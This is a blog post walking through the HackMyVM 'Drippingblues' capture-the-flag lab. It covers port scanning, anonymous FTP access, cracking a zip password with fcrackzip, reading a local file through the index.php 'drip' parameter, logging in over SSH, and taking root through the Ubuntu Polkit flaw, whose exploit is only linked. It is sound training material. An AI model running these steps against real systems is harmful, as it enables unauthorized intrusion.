Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Drippingblues Walkthrough

HackMyVm Drippingblues Walkthrough

Scan ports.

 nmap -sV -sC -p- -oN ports.log                
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rwxrwxrwx    1 0        0             471 Sep 19 18:57 [NSE: writeable]
 | ftp-syst:                                                                  
 |   STAT:                                                                    
 | FTP server status:                                                          
 |      Connected to ::ffff:
 |      Logged in as ftp
 |      TYPE: ASCII                                                                                                                                          
 |      No session bandwidth limit
 |      Session timeout in seconds is 300                      
 |      Control connection is plain text                        
 |      Data connections will be plain text                      
 |      At session startup, client count was 4      
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
 |   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
 |_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 2 disallowed entries  
 |_/dripisreal.txt /etc/dripispowerful.html
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

 ~ gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.php            (Status: 200) [Size: 138]
 /robots.txt           (Status: 200) [Size: 78]

Check index.php, get 2 user names.

 ~ curl  
 driftingblues is hacked again so it's now called drippingblues. :D hahaha
 travisscott & thugger

Check robots.txt,  get a text file and a local html file.

 ~ curl
 User-agent: *
 Disallow: /dripisreal.txt
 Disallow: /etc/dripispowerful.html

Login ftp anonymous, download Bruteforce the zip pass.

 ~ fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt
 PASSWORD FOUND!!!!: pw == 072528035

Unzip, in respectmydrip.txt, get hint.

 ~ cat respectmydrip.txt
 just focus on "drip"⏎  

Fuzz index.php with param drip=/etc/dripispowerful.html. Get a password string.

 ~ curl ''     
 <!DOCTYPE html>
 password is:

Try username thugger we got from index.php. Successfully login ssh.

 ~ ssh thugger@                                                                             ...
 thugger@drippingblues:~$ id
 uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)

The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

 root@drippingblues:/home/thugger# id;hostname
 uid=0(root) gid=0(root) groups=0(root)



Powered By Z-BlogPHP 1.7.1